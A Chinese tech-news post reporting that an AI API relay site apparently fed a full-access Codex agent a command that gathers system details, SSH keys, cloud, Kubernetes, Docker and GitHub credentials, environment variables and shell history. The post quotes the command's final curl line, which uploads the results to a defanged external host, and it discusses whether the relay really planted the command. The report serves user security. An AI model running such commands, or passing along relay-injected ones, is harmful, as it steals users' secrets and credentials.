有用户发现:AI 中转站除了掺水,还会投毒

Wait 5 sec.

V 站的用户昨日发帖称:某 AI 公益站点在开启 Full Access 权限后,AI Agent 生成的一段命令疑似包含环境信息收集与凭据读取行为。包括读取 SSH 私钥、aws 环境变量、API Key、GitHub Token、管理密码、环境变量、终端历史命令等内容,并向外传输。@Appinn发生了什么?命令解读用户在使用中转站时,收到了以上的命令(AI 返回内容),并在拥有完整权限的 Codex 上执行了。这段命令主要做了三件事:收集运行环境信息、扫描敏感配置文件、将结果发送到远程地址。具体为:1. 收集系统信息读取:Node / npm 版本主机名当前用户与权限当前目录Linux 内核信息环境变量用于获取当前运行环境的基本信息。2. 搜索配置与认证信息尝试读取:cli-proxy-api 配置文件config.yamlauth-dir 认证目录同时扫描:~/.ssh/:SSH 密钥与配置~/.aws/:AWS 凭据~/.kube/:Kubernetes 配置~/.docker/:Docker 登录信息GitHub CLI 配置npm、pip、Cloudflare 等工具配置这些文件可能包含 API Key、Token、登录凭据等敏感信息。3. 获取系统运行状态收集:Docker 容器信息当前运行进程网络端口systemd 服务Shell 历史记录用于了解当前机器运行了哪些服务。4. 上传收集结果命令最后通过:curl -s -X POST --data-binary @- https://proxy[.]jxtech.store/canary是否可以确认是“投毒”?虽然,以上命令有明显的投毒行为,但还有几个问题:无法确认命令来源AI 模型生成;用户编写的提示词诱导 AI 生成;某个插件或自定义模块中的脚本;其他上下文内容触发。仅凭最终出现的命令,无法证明它一定来自站点后台或服务方。无法确认执行链路目前只能看到用户展示的命令内容,无法确认:命令是否真的执行;执行环境是什么;是否完整运行;上传请求是否成功。所以,留下一个问题:有没有其他用户提供更完整的使用过程,系统提示词、用户指令等内容。最后,中转站,尤其廉价中转站,请不要对其抱有幻想,默认泄漏 😭原文:https://www.appinn.com/ai-agent-full-access-security-risk/相关阅读基于微信官方 OpenClaw 插件,将任意 AI 接入微信软件 AI 化,势不可挡|AI Agent 是什么?QQ 邮箱发布 AI 专用邮箱:Agent Mail,每人可抢注两个地址[内测]Access Dots – 实时提醒,有应用正在用你的摄像头和麦克风[Android]Cloudflare 开始为 AI 提供特权:人类需要注册,AI 免注册©2021 青小蛙 for 小众软件 | 加入我们 | 投稿 | 订阅指南 3659b075e72a5b7b1b87ea74aa7932ff 点击这里留言、和原作者一起评论[ 点击前往获取链接 ]